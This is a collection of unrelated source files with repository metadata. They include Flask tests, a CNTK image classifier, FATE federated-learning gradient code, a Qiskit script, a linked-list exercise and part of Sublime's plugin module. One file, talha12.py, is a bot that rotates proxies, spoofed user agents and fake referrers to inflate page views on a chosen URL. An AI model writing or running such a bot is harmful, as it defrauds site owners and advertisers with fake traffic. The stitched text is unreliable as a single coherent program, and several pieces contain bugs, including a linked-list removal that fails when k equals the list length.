tests/twitter_learning_journal/controllers/test_login.py
|
DEV3L/twitter-learning-journal
|
a51d22a60a3d1249add352d8357975a7f2db585c
|
[
"Beerware"
] | 1
|
2021-01-12T17:06:57.000Z
|
2021-01-12T17:06:57.000Z
|
tests/twitter_learning_journal/controllers/test_login.py
|
DEV3L/twitter-learning-journal
|
a51d22a60a3d1249add352d8357975a7f2db585c
|
[
"Beerware"
] | null | null | null |
tests/twitter_learning_journal/controllers/test_login.py
|
DEV3L/twitter-learning-journal
|
a51d22a60a3d1249add352d8357975a7f2db585c
|
[
"Beerware"
] | 1
|
2018-07-31T21:16:33.000Z
|
2018-07-31T21:16:33.000Z
|
import os
import tempfile
import unittest
from app.twitter_learning_journal.database.sqlalchemy_database import build_tables, Database
from server import app
class FlaskrTestCase(unittest.TestCase):
def setUp(self):
self.db_fd, app.config['DATABASE'] = tempfile.mkstemp()
app.testing = True
self.app = app.test_client()
self.database = Database()
with app.app_context():
build_tables(self.database)
def tearDown(self):
os.close(self.db_fd)
os.unlink(app.config['DATABASE'])
def test_login_endpoint_exists(self):
expected_response_code = 200
username = 'username'
password = 'password'
response = self.app.post('/login', data=dict(
username=username,
password=password
), follow_redirects=True)
assert expected_response_code == response.status_code
| 25.971429
| 92
| 0.661166
|
89ecb8693e5ab8de91f2491f159adaaf3609b92e
| 3,379
|
py
|
Python
|
services/cntk-image-recon/service/image_recon.py
|
arturgontijo/dnn-model-services
|
b5b1453a1e933bdc79451f172873f31fb7fd9842
|
[
"MIT"
] | 26
|
2018-12-14T20:02:07.000Z
|
2021-10-07T19:39:16.000Z
|
services/cntk-image-recon/service/image_recon.py
|
arturgontijo/dnn-model-services
|
b5b1453a1e933bdc79451f172873f31fb7fd9842
|
[
"MIT"
] | 73
|
2018-08-09T17:13:21.000Z
|
2022-03-12T00:03:16.000Z
|
services/cntk-image-recon/service/image_recon.py
|
arturgontijo/dnn-model-services
|
b5b1453a1e933bdc79451f172873f31fb7fd9842
|
[
"MIT"
] | 33
|
2018-10-24T10:45:48.000Z
|
2022-03-19T05:39:48.000Z
|
# Import CNTK
import cntk
import numpy as np
from PIL import Image
import os
import time
import requests
import base64
import logging
import datetime
import hashlib
import traceback
logging.basicConfig(level=10, format="%(asctime)s - [%(levelname)8s] - %(name)s - %(message)s")
log = logging.getLogger("cntk_image_recon")
resources_root = os.path.join("..", "..", "utils", "Resources")
# Evaluates a single image using the re-trained model
def eval_single_image(loaded_model, image_path, image_dims):
    # Load and format image (resize, RGB -> BGR, HWC -> CHW)
try:
img = Image.open(image_path)
if image_path.endswith("png"):
temp = Image.new("RGB", img.size, (255, 255, 255))
temp.paste(img, img)
img = temp
resized = img.resize((image_dims[2], image_dims[1]), Image.ANTIALIAS)
bgr_image = np.asarray(resized, dtype=np.float32)[..., [2, 1, 0]]
hwc_format = np.ascontiguousarray(np.rollaxis(bgr_image, 2))
# Compute model output
arguments = {loaded_model.arguments[0]: [hwc_format]}
output = loaded_model.eval(arguments)
# Return softmax probabilities
sm = cntk.softmax(output[0])
return sm.eval()
except FileNotFoundError:
log.error("Could not open (skipping file): ", image_path)
return ["None"]
def image_recognition(method, model, map_names, img_path, image_dims):
try:
tmp_img_file = generate_uid() + ".jpg"
# Link
if "http://" in img_path or "https://" in img_path:
header = {'User-Agent': 'Mozilla/5.0 (Windows NT x.y; Win64; x64; rv:9.0) Gecko/20100101 Firefox/10.0'}
r = requests.get(img_path, headers=header, allow_redirects=True)
with open(tmp_img_file, "wb") as my_f:
my_f.write(r.content)
img_path = tmp_img_file
# Base64
elif len(img_path) > 500:
img_data = base64.b64decode(img_path)
with open(tmp_img_file, "wb") as f:
f.write(img_data)
img_path = tmp_img_file
model_file = os.path.join(resources_root, "Models", "{}_{}_20.model".format(method, model))
if model == "AlexNet":
image_dims = (3, 227, 227)
elif model == "InceptionV3":
image_dims = (3, 299, 299)
start_time = time.time()
trained_model = cntk.load_model(model_file)
probs = eval_single_image(trained_model, img_path, image_dims)
top_5_dict = {}
p_array = probs.argsort()[-5:][::-1]
for i, prob in enumerate(p_array):
perc = probs[prob] * 100
top_5_dict[i + 1] = "{0:05.2f}%: {1}".format(perc, map_names[int(prob)])
delta_time = time.time() - start_time
if os.path.exists(tmp_img_file):
os.remove(tmp_img_file)
return {"delta_time": "{:.4f}".format(delta_time), "top_5": top_5_dict}
except Exception as e:
log.error(e)
traceback.print_exc()
return {"delta_time": "Fail", "top_5": "Fail", "error": str(e)}
def generate_uid():
    # Seed the hash with the current timestamp
seed = "{}".format(datetime.datetime.now())
m = hashlib.sha256()
m.update(seed.encode("utf-8"))
m = m.hexdigest()
    # Return only the first and last 10 hex digits
return m[:10] + m[-10:]
| 33.455446
| 115
| 0.606688
|
116cca3ce2b1986ccd53e66a94d371828412c04a
| 2,526
|
py
|
Python
|
application/models/environment.py
|
opengovt/openroads-geostore
|
336bdc352252ae34a66746e632ae0b8df66c04c0
|
[
"MIT"
] | 1
|
2019-10-11T14:43:53.000Z
|
2019-10-11T14:43:53.000Z
|
application/models/environment.py
|
opengovt/openroads-geostore
|
336bdc352252ae34a66746e632ae0b8df66c04c0
|
[
"MIT"
] | null | null | null |
application/models/environment.py
|
opengovt/openroads-geostore
|
336bdc352252ae34a66746e632ae0b8df66c04c0
|
[
"MIT"
] | null | null | null |
import time
import datetime
from google.appengine.ext import ndb
from application.models.syslog import SysLog
class Environment(SysLog):
created = ndb.DateTimeProperty(auto_now_add=True)
updated = ndb.DateTimeProperty(auto_now=True)
owner = ndb.KeyProperty(kind='User')
users = ndb.KeyProperty(repeated=True)
description = ndb.TextProperty()
title = ndb.StringProperty()
invited_users = ndb.StringProperty(repeated=True)
user_groups = ndb.KeyProperty(repeated=True)
users_email = ndb.StringProperty(repeated=True)
private = ndb.BooleanProperty(default=True)
def to_object(self):
data = {}
created = self.created
created += datetime.timedelta(hours=8)
data["created_time"] = created.strftime("%b %d, %Y %I:%M:%S %p")
data['created'] = time.mktime(created.timetuple())
data['updated'] = time.mktime(self.updated.timetuple())
data['users'] = [user.urlsafe() for user in self.users]
data['title'] = self.title
data['description'] = self.description
data['key'] = self.key.urlsafe()
data['id'] = str(self.key.id())
data['members'] = []
data['invited_users'] = self.invited_users
data['users_email'] = self.users_email
data['user_groups'] = []
data['user_groups_list'] = []
data['private_setting'] = self.private
data['owner'] = self.owner.get().to_object()
if self.user_groups:
for g in self.user_groups:
if g:
data['user_groups'].append(g.id())
group = g.get()
if group:
data['user_groups_list'].append(group.to_object())
if self.users:
for u in self.users:
user = u.get()
if user:
data['members'].append(user.to_object())
return data
def to_api_object(self):
data = {}
created = self.created
created += datetime.timedelta(hours=8)
data["created_time"] = created.strftime("%b %d, %Y %I:%M:%S %p")
data['created'] = time.mktime(created.timetuple())
data['updated'] = time.mktime(self.updated.timetuple())
data['title'] = self.title
data['description'] = self.description
data['key'] = self.key.urlsafe()
data['id'] = str(self.key.id())
data['users_email'] = self.users_email
data['private_setting'] = self.private
return data
| 35.577465
| 74
| 0.586698
|
5443ce4263178c8f1f5c0edd13533237274c35a8
| 5,295
|
py
|
Python
|
data/p3BR/R1/benchmark/startQiskit_QC32.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p3BR/R1/benchmark/startQiskit_QC32.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p3BR/R1/benchmark/startQiskit_QC32.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=3
# total number=6
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
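# Illustrative sketch (not from the original script): how the two bitstring
# helpers above compose into the hidden-string function f(x) = a.x XOR b used
# by the Bernstein-Vazirani tests below. The values of a and b are hypothetical.
def _example_bitstring_helpers():
    a, b = "101", "1"
    f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
    assert f("000") == "1"   # dot product is 0, xor with b gives 1
    assert f("100") == "0"   # dot product is 1, xor with b gives 0
    return f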
def build_oracle(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
# oracle.draw('mpl', filename=(kernel + '-oracle.png'))
return oracle
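# Illustrative note (not from the original script): for n = 2 controls the
# oracle above acts on 3 qubits; e.g. build_oracle(2, lambda rep: "1" if
# rep == "11" else "0") adds no X gates and reduces to a single Toffoli.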
def build_circuit(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the Bernstein-Vazirani circuit
zero = np.binary_repr(0, n)
b = f(zero)
# initial n + 1 bits
input_qubit = QuantumRegister(n+1, "qc")
classicals = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classicals)
# inverse last one (can be omitted if using O_f^\pm)
prog.x(input_qubit[n])
# circuit begin
prog.h(input_qubit[1]) # number=1
prog.rx(-0.09738937226128368,input_qubit[2]) # number=2
prog.h(input_qubit[1]) # number=3
# apply H to get superposition
for i in range(n):
prog.h(input_qubit[i])
prog.h(input_qubit[n])
prog.barrier()
# apply oracle O_f
oracle = build_oracle(n, f)
prog.append(
oracle.to_gate(),
[input_qubit[i] for i in range(n)] + [input_qubit[n]])
# apply H back (QFT on Z_2^n)
for i in range(n):
prog.h(input_qubit[i])
prog.barrier()
# measure
return prog
def get_statevector(prog: QuantumCircuit) -> Any:
state_backend = Aer.get_backend('statevector_simulator')
statevec = execute(prog, state_backend).result()
quantum_state = statevec.get_statevector()
qubits = round(log2(len(quantum_state)))
quantum_state = {
"|" + np.binary_repr(i, qubits) + ">": quantum_state[i]
for i in range(2 ** qubits)
}
return quantum_state
def evaluate(backend_str: str, prog: QuantumCircuit, shots: int, b: str) -> Any:
# Q: which backend should we use?
# get state vector
quantum_state = get_statevector(prog)
# get simulate results
# provider = IBMQ.load_account()
# backend = provider.get_backend(backend_str)
# qobj = compile(prog, backend, shots)
# job = backend.run(qobj)
# job.result()
backend = Aer.get_backend(backend_str)
# transpile/schedule -> assemble -> backend.run
results = execute(prog, backend, shots=shots).result()
counts = results.get_counts()
a = Counter(counts).most_common(1)[0][0][::-1]
return {
"measurements": counts,
# "state": statevec,
"quantum_state": quantum_state,
"a": a,
"b": b
}
def bernstein_test_1(rep: str):
"""011 . x + 1"""
a = "011"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_2(rep: str):
"""000 . x + 0"""
a = "000"
b = "0"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_3(rep: str):
"""111 . x + 1"""
a = "111"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
if __name__ == "__main__":
n = 2
a = "11"
b = "1"
f = lambda rep: \
bitwise_xor(bitwise_dot(a, rep), b)
prog = build_circuit(n, f)
    sample_shot = 4000
writefile = open("../data/startQiskit_QC32.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = provider.get_backend("ibmq_belem")
circuit1 = transpile(prog, FakeYorktown())
circuit1.h(qubit=2)
circuit1.x(qubit=3)
circuit1.measure_all()
info = execute(circuit1,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
| 28.777174
| 140
| 0.628329
|
0161d3f232849a90f7a436dc669557498fa64e44
| 648
|
py
|
Python
|
data-structures-implementation/linked-list/remove-kth-last-element-from-linked-list.py
|
ardakkk/Algorithms-and-Data-Structures
|
c428bb0bd7eeb6c34448630f88f13e1329b54636
|
[
"MIT"
] | null | null | null |
data-structures-implementation/linked-list/remove-kth-last-element-from-linked-list.py
|
ardakkk/Algorithms-and-Data-Structures
|
c428bb0bd7eeb6c34448630f88f13e1329b54636
|
[
"MIT"
] | null | null | null |
data-structures-implementation/linked-list/remove-kth-last-element-from-linked-list.py
|
ardakkk/Algorithms-and-Data-Structures
|
c428bb0bd7eeb6c34448630f88f13e1329b54636
|
[
"MIT"
] | null | null | null |
class Node:
def __init__(self, val, next):
self.val = val
self.next = next
def __str__(self):
n = self
answer = ''
while n:
answer += str(n.val)
n = n.next
return answer
# Time: O(n)
# Space: O(1)
def remove_kth_from_linked_list(node, k):
slow, fast = node, node
for i in range(k):
fast = fast.next
prev = None
while fast:
prev = slow
fast = fast.next
slow = slow.next
prev.next = slow.next
return node
head = Node(1, Node(2, Node(3, Node(4, Node(5, None)))))
remove_kth_from_linked_list(head, 3)
print(head)
| 20.903226
| 56
| 0.54321
|
43c2adaeeac5ca89807769188cbd811e3a11dbc2
| 12,499
|
py
|
Python
|
federatedml/optim/gradient/hetero_linear_model_gradient.py
|
peiyong86/FATE
|
efae2b1add20d9f98ac05a669298e36369f91497
|
[
"Apache-2.0"
] | 1
|
2019-10-16T12:18:06.000Z
|
2019-10-16T12:18:06.000Z
|
federatedml/optim/gradient/hetero_linear_model_gradient.py
|
peiyong86/FATE
|
efae2b1add20d9f98ac05a669298e36369f91497
|
[
"Apache-2.0"
] | 9
|
2020-01-28T23:05:25.000Z
|
2022-02-10T00:31:01.000Z
|
federatedml/optim/gradient/hetero_linear_model_gradient.py
|
peiyong86/FATE
|
efae2b1add20d9f98ac05a669298e36369f91497
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import numpy as np
from arch.api.utils import log_utils
from federatedml.util import consts
from federatedml.util import fate_operator
LOGGER = log_utils.getLogger()
def __compute_partition_gradient(data, fit_intercept=True):
"""
    Compute the hetero regression gradient:
    gradient = ∑d*x, where d is the fore_gradient, which differs across algorithms
    Parameters
    ----------
    data: DTable, includes fore_gradient and features
    fit_intercept: bool, whether the model has an intercept. Default True
Returns
----------
numpy.ndarray
hetero regression model gradient
"""
feature = []
fore_gradient = []
for key, value in data:
feature.append(value[0])
fore_gradient.append(value[1])
feature = np.array(feature)
fore_gradient = np.array(fore_gradient)
gradient = []
if feature.shape[0] <= 0:
return 0
for j in range(feature.shape[1]):
feature_col = feature[:, j]
gradient_j = fate_operator.dot(feature_col, fore_gradient)
gradient.append(gradient_j)
if fit_intercept:
bias_grad = np.sum(fore_gradient)
gradient.append(bias_grad)
return np.array(gradient)
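# Illustrative sketch (not part of the original module): the per-partition
# gradient above is a column-wise dot product between the features and the
# fore_gradient residuals. All values below are hypothetical.
def _example_partition_gradient():
    features = np.array([[1.0, 2.0], [3.0, 4.0]])   # two rows, two features
    fore_gradient = np.array([0.5, -1.0])            # residual d for each row
    grad = [fate_operator.dot(features[:, j], fore_gradient)
            for j in range(features.shape[1])]
    # expected: [1*0.5 + 3*(-1), 2*0.5 + 4*(-1)] == [-2.5, -3.0]
    return np.array(grad)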
def compute_gradient(data_instances, fore_gradient, fit_intercept):
"""
Compute hetero-regression gradient
Parameters
----------
data_instances: DTable, input data
fore_gradient: DTable, fore_gradient
fit_intercept: bool, if model has intercept or not
Returns
----------
DTable
the hetero regression model's gradient
"""
feat_join_grad = data_instances.join(fore_gradient,
lambda d, g: (d.features, g))
f = functools.partial(__compute_partition_gradient,
fit_intercept=fit_intercept)
gradient_partition = feat_join_grad.mapPartitions(f).reduce(lambda x, y: x + y)
gradient = gradient_partition / data_instances.count()
return gradient
class Guest(object):
def __init__(self):
self.host_forwards = None
self.forwards = None
self.aggregated_forwards = None
def _register_gradient_sync(self, host_forward_transfer, fore_gradient_transfer,
guest_gradient_transfer, guest_optim_gradient_transfer):
self.host_forward_transfer = host_forward_transfer
self.fore_gradient_transfer = fore_gradient_transfer
self.unilateral_gradient_transfer = guest_gradient_transfer
self.unilateral_optim_gradient_transfer = guest_optim_gradient_transfer
def compute_and_aggregate_forwards(self, data_instances, model_weights,
encrypted_calculator, batch_index, offset=None):
raise NotImplementedError("Function should not be called here")
def compute_gradient_procedure(self, data_instances, encrypted_calculator, model_weights, optimizer,
n_iter_, batch_index, offset=None):
"""
Linear model gradient procedure
        Step 1: get the host forwards, which differ across algorithms
        For Logistic Regression and Linear Regression: forwards = wx
        For Poisson Regression: forwards = exp(wx)
        Step 2: compute the guest's own forwards, aggregate them with the host forwards, and obtain d = fore_gradient
        Step 3: compute the unilateral gradient = ∑d*x
        Step 4: send the unilateral gradient to the arbiter and receive the optimized, decrypted gradient.
"""
current_suffix = (n_iter_, batch_index)
self.host_forwards = self.get_host_forward(suffix=current_suffix)
fore_gradient = self.compute_and_aggregate_forwards(data_instances, model_weights,
encrypted_calculator, batch_index, offset)
self.remote_fore_gradient(fore_gradient, suffix=current_suffix)
unilateral_gradient = compute_gradient(data_instances,
fore_gradient,
model_weights.fit_intercept)
if optimizer is not None:
unilateral_gradient = optimizer.add_regular_to_grad(unilateral_gradient, model_weights)
optimized_gradient = self.update_gradient(unilateral_gradient, suffix=current_suffix)
return optimized_gradient, fore_gradient, self.host_forwards
def get_host_forward(self, suffix=tuple()):
host_forward = self.host_forward_transfer.get(idx=-1, suffix=suffix)
return host_forward
def remote_fore_gradient(self, fore_gradient, suffix=tuple()):
self.fore_gradient_transfer.remote(obj=fore_gradient, role=consts.HOST, idx=-1, suffix=suffix)
def update_gradient(self, unilateral_gradient, suffix=tuple()):
self.unilateral_gradient_transfer.remote(unilateral_gradient, role=consts.ARBITER, idx=0, suffix=suffix)
optimized_gradient = self.unilateral_optim_gradient_transfer.get(idx=0, suffix=suffix)
return optimized_gradient
class Host(object):
def __init__(self):
self.forwards = None
self.fore_gradient = None
def _register_gradient_sync(self, host_forward_transfer, fore_gradient_transfer,
host_gradient_transfer, host_optim_gradient_transfer):
self.host_forward_transfer = host_forward_transfer
self.fore_gradient_transfer = fore_gradient_transfer
self.unilateral_gradient_transfer = host_gradient_transfer
self.unilateral_optim_gradient_transfer = host_optim_gradient_transfer
def compute_forwards(self, data_instances, model_weights):
raise NotImplementedError("Function should not be called here")
def compute_unilateral_gradient(self, data_instances, fore_gradient, model_weights, optimizer):
raise NotImplementedError("Function should not be called here")
def compute_gradient_procedure(self, data_instances, model_weights,
encrypted_calculator, optimizer,
n_iter_, batch_index):
"""
Linear model gradient procedure
        Step 1: compute the host forwards, which differ across algorithms
For Logistic Regression: forwards = wx
"""
current_suffix = (n_iter_, batch_index)
self.forwards = self.compute_forwards(data_instances, model_weights)
encrypted_forward = encrypted_calculator[batch_index].encrypt(self.forwards)
self.remote_host_forward(encrypted_forward, suffix=current_suffix)
fore_gradient = self.get_fore_gradient(suffix=current_suffix)
unilateral_gradient = compute_gradient(data_instances,
fore_gradient,
model_weights.fit_intercept)
if optimizer is not None:
unilateral_gradient = optimizer.add_regular_to_grad(unilateral_gradient, model_weights)
optimized_gradient = self.update_gradient(unilateral_gradient, suffix=current_suffix)
return optimized_gradient, fore_gradient
def remote_host_forward(self, host_forward, suffix=tuple()):
self.host_forward_transfer.remote(obj=host_forward, role=consts.GUEST, idx=0, suffix=suffix)
def get_fore_gradient(self, suffix=tuple()):
host_forward = self.fore_gradient_transfer.get(idx=0, suffix=suffix)
return host_forward
def update_gradient(self, unilateral_gradient, suffix=tuple()):
self.unilateral_gradient_transfer.remote(unilateral_gradient, role=consts.ARBITER, idx=0, suffix=suffix)
optimized_gradient = self.unilateral_optim_gradient_transfer.get(idx=0, suffix=suffix)
return optimized_gradient
class Arbiter(object):
def __init__(self):
self.has_multiple_hosts = False
def _register_gradient_sync(self, guest_gradient_transfer, host_gradient_transfer,
guest_optim_gradient_transfer, host_optim_gradient_transfer):
self.guest_gradient_transfer = guest_gradient_transfer
self.host_gradient_transfer = host_gradient_transfer
self.guest_optim_gradient_transfer = guest_optim_gradient_transfer
self.host_optim_gradient_transfer = host_optim_gradient_transfer
def compute_gradient_procedure(self, cipher_operator, optimizer, n_iter_, batch_index):
"""
Compute gradients.
        Receive local gradients from the guest and hosts, merge and optimize them, then split and send them back.
Parameters
----------
cipher_operator: Use for encryption
optimizer: optimizer that get delta gradient of this iter
n_iter_: int, current iter nums
batch_index: int, use to obtain current encrypted_calculator
"""
current_suffix = (n_iter_, batch_index)
host_gradients, guest_gradient = self.get_local_gradient(current_suffix)
if len(host_gradients) > 1:
self.has_multiple_hosts = True
host_gradients = [np.array(h) for h in host_gradients]
guest_gradient = np.array(guest_gradient)
size_list = [h_g.shape[0] for h_g in host_gradients]
size_list.append(guest_gradient.shape[0])
        gradient = np.hstack(host_gradients)
gradient = np.hstack((gradient, guest_gradient))
grad = np.array(cipher_operator.decrypt_list(gradient))
LOGGER.debug("In arbiter compute_gradient_procedure, before apply grad: {}, size_list: {}".format(
grad, size_list
))
delta_grad = optimizer.apply_gradients(grad)
LOGGER.debug("In arbiter compute_gradient_procedure, delta_grad: {}".format(
delta_grad
))
separate_optim_gradient = self.separate(delta_grad, size_list)
LOGGER.debug("In arbiter compute_gradient_procedure, separated gradient: {}".format(
separate_optim_gradient
))
host_optim_gradients = separate_optim_gradient[: -1]
guest_optim_gradient = separate_optim_gradient[-1]
self.remote_local_gradient(host_optim_gradients, guest_optim_gradient, current_suffix)
return delta_grad
@staticmethod
def separate(value, size_list):
"""
        Split value into several sets according to size_list
Parameters
----------
value: list or ndarray, input data
size_list: list, each set size
Returns
----------
list
set after separate
"""
separate_res = []
cur = 0
for size in size_list:
separate_res.append(value[cur:cur + size])
cur += size
return separate_res
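    # Illustrative example of `separate` (hypothetical sizes): a decrypted
    # gradient of length 5 split with size_list = [2, 2, 1] yields
    # [value[0:2], value[2:4], value[4:5]] -- host parts first, guest part last.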
def get_local_gradient(self, suffix=tuple()):
host_gradients = self.host_gradient_transfer.get(idx=-1, suffix=suffix)
LOGGER.info("Get host_gradient from Host")
guest_gradient = self.guest_gradient_transfer.get(idx=0, suffix=suffix)
LOGGER.info("Get guest_gradient from Guest")
return host_gradients, guest_gradient
def remote_local_gradient(self, host_optim_gradients, guest_optim_gradient, suffix=tuple()):
for idx, host_optim_gradient in enumerate(host_optim_gradients):
self.host_optim_gradient_transfer.remote(host_optim_gradient,
role=consts.HOST,
idx=idx,
suffix=suffix)
self.guest_optim_gradient_transfer.remote(guest_optim_gradient,
role=consts.GUEST,
idx=0,
suffix=suffix)
| 39.805732
| 112
| 0.669334
|
70377993b318752d16fe8a9ea915272beedae22d
| 4,222
|
py
|
Python
|
talha12.py
|
talha123444e441/talha12
|
0d1ae324d297d1382966adaec874aa09f083bb34
|
[
"Apache-2.0"
] | null | null | null |
talha12.py
|
talha123444e441/talha12
|
0d1ae324d297d1382966adaec874aa09f083bb34
|
[
"Apache-2.0"
] | null | null | null |
talha12.py
|
talha123444e441/talha12
|
0d1ae324d297d1382966adaec874aa09f083bb34
|
[
"Apache-2.0"
] | null | null | null |
#!/system/bin/python
#TOOL OWNER Cayber solution bd
#Coded By Talha
#Date & Time 24/12/2021 [06:09]
#TDF
import urllib2
import urllib
import sys
import time
import random
import re
import os
os.system("clear")
#Colors
B = '\033[1m' #Bold
R = '\033[31m' #Red
G = '\033[32m' #Green
Y = '\033[33m' #Yellow
BL = '\033[34m' #Blue
P = '\033[35m' #Purple
W = '\033[37m' #White
U = '\033[2m' #Underline
N = '\033[0m' #Normal
#Make sure the proxy list is in the same directory as this Python script
proxy_list = "proxylist.txt"
bacod = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
#Respect the author!.. Coding is not easy!..
gblk = ['http://google.com','http://bing.com','http://facebook.com','http://twitter.com','http://yahoo.com']
print B+G+""
print " _____ __ ___ "
print " CYBER SOLUTION BD "
print " CYBER SOLUTION BD "
print " CYBER SOLUTION BD"
print "_"
print "-"
print B+G+"TALHA"
print " _______________ _______________ ____ "
print " Abu Talha "
print " Abu Talha "
print " Abu Talha "
print " Abu Talha "
print " Abu Talha "
time.sleep(2)
print ''
print B+BL+'#-----------------------------------------#'
print B+R+' TAKE LOVE FROM CSB FAMILY'
print B+BL+'#-----------------------------------------#'
print B+W+' 1.YOU CAN GET UNLIMITED VIEW FROM THIS TOOL'
print B+W+'2.THIS TOOL OWNER :CYBER SOLUTION BD'
print B+W+'3.CODED BY MD Abu Talha '
print B+W+'4.WE ARE SYSTEM MAKERS'
print B+W+'5.CYBER SOLUTION BD '
print B+BL+'#-----------------------------------------#'
print B+R+' \!/WARNING\!/'
print B+BL+'#-----------------------------------------#'
ini_url = raw_input (B+Y+"[+] WEBPAGE URL : ")
print ''
print B+Y+'[+] STARTING => '+B+BL+'|'+B+W,ini_url
print B+BL+'#-----------------------------------------#'
def Autoclicker(proxy1):
try:
proxy = proxy1.split(":")
print B+BL+"#-----------------------------------------#\n"+B+W+'[-]',proxy1, ""+B+P+"=> Process"+N
time.sleep(2)
proxy_set = urllib2.ProxyHandler({"http" : "%s:%d" % (proxy[0], int(proxy[1]))})
opener = urllib2.build_opener(proxy_set, urllib2.HTTPHandler)
opener.addheaders = [('User-agent', random.choice(bacod)),
('Refferer', random.choice(gblk))]
urllib2.install_opener(opener)
f = urllib2.urlopen(ini_url)
#187034
if "google.com" in f.read():
print B+G+"[*] 200 OK"+"\n"+B+BL+"#-----------------------------------------#\n"+N
else:
print B+R+"[*] Link Gagal Di Kunjungi !\n"+B+BL+"#-----------------------------------------#\n"+N
print B+R+"[!] Proxy / Connection Failed\n"+B+BL+"#-----------------------------------------#\n"+N
except:
print B+R+"[!] Proxy Error\n"+B+BL+"#-----------------------------------------#\n"+N
time.sleep(5)
pass
def loadproxy():
try:
get_file = open(proxy_list, "r")
proxylist = get_file.readlines()
count = 0
proxy = []
while count < len(proxylist):
proxy.append(proxylist[count].strip())
count += 1
for i in proxy:
Autoclicker(i)
except IOError:
print B+W+"\n[-] Error : Proxy List Tidak Ditemukan / Belum Dibuat\n"+N
sys.exit(1)
def main():
print """
"""+N
loadproxy()
if __name__ == '__main__':
main()
| 36.08547
| 116
| 0.553529
|
541a5fbf78ae5d8016a0a7af7c01bc13f761637e
| 19,351
|
py
|
Python
|
sublime_plugin.py
|
koery/win-sublime
|
1b16cbe9858eced52567971286109250df787d36
|
[
"MIT"
] | null | null | null |
sublime_plugin.py
|
koery/win-sublime
|
1b16cbe9858eced52567971286109250df787d36
|
[
"MIT"
] | null | null | null |
sublime_plugin.py
|
koery/win-sublime
|
1b16cbe9858eced52567971286109250df787d36
|
[
"MIT"
] | null | null | null |
import sublime
import threading
import imp
import importlib
import os
import sys
import zipfile
import sublime_api
import traceback
api_ready = False
application_command_classes = []
window_command_classes = []
text_command_classes = []
all_command_classes = [application_command_classes, window_command_classes, text_command_classes]
all_callbacks = {'on_new': [], 'on_clone': [], 'on_load': [], 'on_pre_close': [], 'on_close': [],
'on_pre_save': [], 'on_post_save': [], 'on_modified': [],
'on_selection_modified': [],'on_activated': [], 'on_deactivated': [],
